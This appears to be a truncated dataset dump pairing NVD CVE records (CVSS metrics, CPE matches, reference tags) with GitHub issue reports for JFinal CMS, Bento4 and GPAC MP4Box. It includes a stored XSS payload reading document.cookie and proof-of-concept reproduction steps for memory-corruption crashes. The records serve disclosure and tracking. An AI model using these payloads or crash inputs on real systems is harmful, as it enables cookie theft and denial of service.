"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/39 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | There is a stored XSS vulnerability in JFinal_cms 's publish blog module. An attacker can insert malicious XSS code into the keyword field. When the user views the content of the article in the foreground, the malicious XSS code is triggered successfully.
payload: `" onmouseover="alert(document.cookie)`
<img widt... | XSS vulnerability stored in the publish blog module of Jfinal_cms V5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/39/comments | 1 | 2022-06-10T14:54:45Z | 2022-07-11T10:09:49Z | https://github.com/jflyfox/jfinal_cms/issues/39 | 1,267,664,722 | 39 |
CVE-2022-33114 | 2022-06-23T17:15:14.833 | Jfinal CMS v5.1.0 was discovered to contain a SQL injection vulnerability via the attrVal parameter at /jfinal_cms/system/dict/list. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/38"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/38 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | # Vulnerability Analysis
The vulnerability appears in lines 23-28 of the **com.jflyfox.system.dict.DictController.java**
<img width="951" alt="image-20220610104610536" src="https://user-images.githubusercontent.com/30547070/172980296-78159fe2-2e0d-4e2c-aae3-cf1bd3095253.png">
<img width="1079" alt="image-2022061... | SQL injection vulnerability exists in JFinal CMS 5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/38/comments | 0 | 2022-06-10T02:49:09Z | 2022-06-14T20:59:46Z | https://github.com/jflyfox/jfinal_cms/issues/38 | 1,266,938,033 | 38 |
CVE-2021-40941 | 2022-06-27T18:15:08.803 | In Bento4 1.6.0-638, there is an allocator is out of memory in the function AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity in Ap4Array.h:172, as demonstrated by GPAC. This can cause a denial of service (DOS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/644"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-638:*:*:*:*:*:*:*",
"matchCriteriaId": "2122DA5E-A523-4D07-B017-982DF2B8B829",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/axiomatic-systems/Bento4/issues/644 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | How to reproduce:
```
1.check out latest code, 5922ba762a
2.compile with asan,
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address -g")
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g")
3.run ./mp4dump --verbosity 3 --format text poc1
```
[poc1.zip](https://github.com/axiomatic-sy... | allocator is out of memory in Ap4Array.h:172 | https://api.github.com/repos/axiomatic-systems/Bento4/issues/644/comments | 0 | 2021-08-25T02:03:31Z | 2021-09-08T02:36:45Z | https://github.com/axiomatic-systems/Bento4/issues/644 | 978,628,921 | 644 |
CVE-2021-40942 | 2022-06-27T21:15:07.900 | In GPAC MP4Box v1.1.0, there is a heap-buffer-overflow in the function filter_parse_dyn_args function in filter_core/filter.c:1454, as demonstrated by GPAC. This can cause a denial of service (DOS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1908"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | https://github.com/gpac/gpac/issues/1908 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough info... | heap-buffer-overflow in MP4Box at filter_core/filter.c:1454 | https://api.github.com/repos/gpac/gpac/issues/1908/comments | 1 | 2021-09-07T10:07:06Z | 2021-09-07T12:49:31Z | https://github.com/gpac/gpac/issues/1908 | 989,818,036 | 1,908 |
CVE-2021-40606 | 2022-06-28T13:15:09.740 | The gf_bs_write_data function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1885"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E",
"versionEndExcluding": "2.0.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/1885 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ..... | Bug: Memcpy from unknown addrees in MP4BOX at src/utils/bitstream.c:1028 | https://api.github.com/repos/gpac/gpac/issues/1885/comments | 0 | 2021-08-24T02:45:45Z | 2021-08-30T15:33:43Z | https://github.com/gpac/gpac/issues/1885 | 977,647,480 | 1,885 |
CVE-2021-40607 | 2022-06-28T13:15:09.797 | The schm_box_size function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1879"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E",
"versionEndExcluding": "2.0.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/1879 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ..... | BUG: heap-buffer-overflow in MP4Box at src/isomedia/schm_box_size:179 | https://api.github.com/repos/gpac/gpac/issues/1879/comments | 0 | 2021-08-19T02:52:37Z | 2021-08-30T15:33:42Z | https://github.com/gpac/gpac/issues/1879 | 974,213,413 | 1,879 |
CVE-2021-40608 | 2022-06-28T13:15:09.840 | The gf_hinter_track_finalize function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1883"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E",
"versionEndExcluding": "2.0.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/1883 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ..... | BUG : free on unknown addrees in MP4BOX at gf_hinter_track_finalize media_tools/isom_hinter.c:956 | https://api.github.com/repos/gpac/gpac/issues/1883/comments | 0 | 2021-08-20T05:15:45Z | 2021-08-30T15:33:43Z | https://github.com/gpac/gpac/issues/1883 | 975,274,297 | 1,883 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.